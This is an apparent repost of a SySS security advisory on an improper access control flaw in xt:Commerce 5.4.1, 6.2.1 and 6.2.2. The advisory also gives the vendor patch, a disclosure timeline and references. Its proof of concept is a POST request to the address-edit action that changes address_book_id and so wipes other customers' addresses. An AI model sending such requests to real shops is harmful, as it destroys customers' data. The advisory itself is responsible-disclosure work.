xt:Commerce version 5.4.1, 6.2.1, and 6.2.2 suffer from an improper access control vulnerability. A logged-in customer can create and alter addresses. These addresses are referenced by incrementing IDs. On saving an address, an attacker could change the ID of the address to write the data to. If the ID belongs to an address which does not belong to the current logged-in user, every field in the address is set to null. An attacker could use this to null all addresses in a shop.
xt:Commerce 5.4.1 / 6.2.1 / 6.2.2 Improper Access Control Vulnerability Overview: xt:Commerce is an online shop software. The product can be described as an online shop software which is mostly used in German speaking regions. It is written in PHP and is available as both a free and paid version. xt:Commerce can also be extended via plug-ins. Due to improper access control, a logged-in user can clear other user addresses. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: A logged-in customer can create and alter addresses. These addresses are referenced by incrementing IDs. On saving an address, an attacker could change the ID of the address to write the data to. If the ID belongs to an address which does not belong to the current logged-in user, every field in the address is set to null. An attacker could use this to null all addresses in a shop. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Sending the following request with an existing address ID belonging to another customer nulls the fields for the inserted address ID: POST /de/customer?page_action=edit_address HTTP/1.1 [...] action=edit_address&address_book_id=[addressId]&old_address_class= default&address_class=default&customers_company=&customers_gender=m& customers_firstname=Pen&customers_lastname=Test&customers_street_address= Test&customers_postcode=12345&customers_city=Test&customers_country_code=DE& customers_phone=123456789&customers_fax=&customers_mobile_phone= ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Apply patch provided by the manufacturer. More information: https://helpdesk.xt-commerce.com/index.php?/Knowledgebase/Article/View/1784/294/adressbuch-sicherheitspatch-17042020-fr-xtcommerce-51-bis-622 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2020-01-23: Found security vulnerability during security assessment 2020-02-03: Customer reported found security vulnerability to manufacturer 2020-03-31: Security advisory with further details sent to manufacturer 2020-03-31: Acknowledgement of security advisory by manufacturer 2020-04-17: Patch released by manufacturer 2020-04-30: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References:  Product website for xt:Commerce https://www.xt-commerce.com/  SySS Security Advisory SYSS-2020-012 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-012.txt  SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ # 0day.today [2020-07-19] #